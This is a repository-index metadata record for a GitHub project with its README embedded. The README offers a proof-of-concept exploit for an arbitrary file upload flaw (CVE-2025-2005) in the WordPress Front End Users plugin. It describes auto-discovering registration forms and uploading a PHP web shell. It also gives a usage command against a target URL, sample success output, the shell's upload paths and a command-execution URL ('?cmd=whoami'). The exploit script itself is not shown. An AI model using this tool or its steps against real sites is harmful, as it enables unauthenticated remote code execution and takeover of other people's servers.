{"id":27256092,"url":"https://github.com/mrmtwoj/cve-2025-2005","last_synced_at":"2026-05-14T20:04:23.927Z","repository":{"id":286483509,"uuid":"961540816","full_name":"mrmtwoj/CVE-2025-2005","owner":"mrmtwoj","description":"WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)","archived":false,"fork":false,"pushed_at":"2025-04-06T18:27:33.000Z","size":11,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-11T02:55:20.896Z","etag":null,"topics":["2005","2025","cve","cve-2025-2005","file-upload-exploit","poc","wordpress","wordpress-feup"],"latest_commit_sha":null,"homepage":"https://acyber.ir","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mrmtwoj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-04-06T18:14:04.000Z","updated_at":"2025-04-09T19:57:20.000Z","dependencies_parsed_at":"2025-04-06T19:25:31.977Z","dependency_job_id":"79c2fada-6f74-4283-baed-d38dbb7fa410","html_url":"https://github.com/mrmtwoj/CVE-2025-2005","commit_stats":null,"previous_names":["mrmtwoj/cve-2025-2005"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/mrmtwoj/CVE-2025-2005","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2FCVE-2025-2005","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2FCVE-2025-2005/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2FCVE-2025-2005/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2FCVE-2025-2005/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mrmtwoj","download_url":"https://codeload.github.com/mrmtwoj/CVE-2025-2005/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2FCVE-2025-2005/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279006451,"owners_count":26084107,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-11T02:00:06.511Z","response_time":55,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["2005","2025","cve","cve-2025-2005","file-upload-exploit","poc","wordpress","wordpress-feup"],"created_at":"2025-04-11T02:49:16.796Z","updated_at":"2025-10-11T06:39:00.712Z","avatar_url":"https://github.com/mrmtwoj.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)\nThis repository provides a Proof of Concept (PoC) exploit for the WordPress Front End Users plugin (versions up to 3.2.32), which is vulnerable to arbitrary file upload due to missing MIME/file-type validation in its registration form.This allows unauthenticated attackers to upload malicious files (e.g., web shells), potentially leading to Remote Code Execution (RCE) on the server.\n\n##  Features\n\n- CVE-2025-2005: WordPress Front End Users plugin file upload vulnerability\n- Simple command-line interface\n- Auto-discovery of registration forms\n- Shell uploader with custom username/password\n\n## How It Works\n- It sends a registration request to the vulnerable FEUP registration form.\n- Uploads a PHP shell via the file input field, bypassing file-type restrictions.\n- Displays the upload status and informs if the site is vulnerable.\n\n## Testing Targets\n* Looks for registration forms containing:\n* ewd-feup-register-form\n* On URLs such as:\n``` \n/register/\n/signup/\n```\n* or any link found on homepage\n\n## Getting Started\n- Python 3.x\n- requests and beautifulsoup4 modules:\n```\npip install requests beautifulsoup4\n```\n## Installation\n```\nhttps://github.com/mrmtwoj/CVE-2025-2005.git\ncd CVE-2025-2005\n```\n## Usage\n```\npython3 exploit.py --url http://target.com --user hacker --password pass123\n```\n##  Sample Output\n```\n[*] Scanning site: http://victim.com\n[*] Found 17 pages.\n[+] Registration form found at: http://victim.com/register\n[*] Uploading shell...\n[+] Shell uploaded successfully!\n```\n## Run Exploit\n```\nLocation ::\nhttp://victim.com/wp-content/uploads/shell.php\nhttp://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php\nRUN ::\nhttp://victim.com/wp-content/uploads/shell.php?cmd=whoami\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrmtwoj%2Fcve-2025-2005","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmrmtwoj%2Fcve-2025-2005","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrmtwoj%2Fcve-2025-2005/lists"}